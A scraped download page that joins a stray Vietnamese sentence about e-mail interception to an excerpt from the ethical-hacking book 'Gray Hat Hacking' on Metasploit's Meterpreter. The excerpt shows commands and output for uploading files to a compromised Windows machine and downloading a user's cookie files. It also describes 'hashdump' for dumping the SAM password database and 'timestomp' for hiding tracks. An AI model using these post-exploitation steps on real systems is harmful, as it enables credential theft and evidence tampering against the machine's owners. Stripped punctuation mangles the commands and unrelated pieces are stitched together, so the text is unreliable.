Đang chuẩn bị nút TẢI XUỐNG, xin hãy chờ
Tải xuống
Một ví dụ sẽ giúp đỡ để minh họa cho vấn đề này. Hãy nói rằng tôi e-mail cho bạn một tin nhắn phải đi qua Internet. Giả sử rằng kể từ khi Al Gore đã phát minh ra Internet, ông cũng đã tìm ra cách để đánh chặn và đọc các tin nhắn được gửi qua Internet. | Gray Hat Hacking The Ethical Hacker s Handbook 90 In the preceding example we have migrated our Meterpreter session to the Explorer process of the current logon session. Now with a more resilient host process let s introduce a few other Meterpreter commands. Here s something the command prompt cannot do upload and download files meterpreter upload c jness run.bat c uploading c jness run.bat - c uploaded c jness run.bat - c Wjness run.bat meterpreter download -r d safe_nt profiles jness cookies c jness downloading d safe_nt profiles jness cookies index.dat - c jness index.dat downloaded d safe_nt profiles jness cookies index.dat - c jness index.dat downloading d safe_nt profiles jness cookies jness@dell 1 .txt - c jness jness@dell 1 .txt downloaded d safe_nt profiles jness cookies jness@dell 1 .txt - c jness jness@dell 1 .txt downloading d safe_nt profiles jness cookies jness@google 1 .txt - c jness jness@google 1 .txt Other highlights of the Meterpreter include support for Stopping and starting the keyboard and mouse of the user s logon session fun Listing stopping and starting processes Shutting down or rebooting the machine Enumerating creating deleting and setting registry keys Turning the workstation into a traffic router especially handy on dual-homed machines bridging one public network to another private network Complete Ruby scripting environment enabling limitless possibilities If you find yourself with administrative privileges on a compromised machine you can also add the privileged extension meterpreter use priv Loading extension priv.success. Priv Password database Commands Command Description ------- ------------------ hashdump Dumps the contents of the SAM database Priv Timestomp Commands Command Description timestomp Manipulate file MACE attributes Chapter 4 Using Metasploit 91 The hashdump command works like pwdump allowing you to dump the SAM database. Timestomp allows hackers to cover their tracks by setting the Modified Accessed Created or .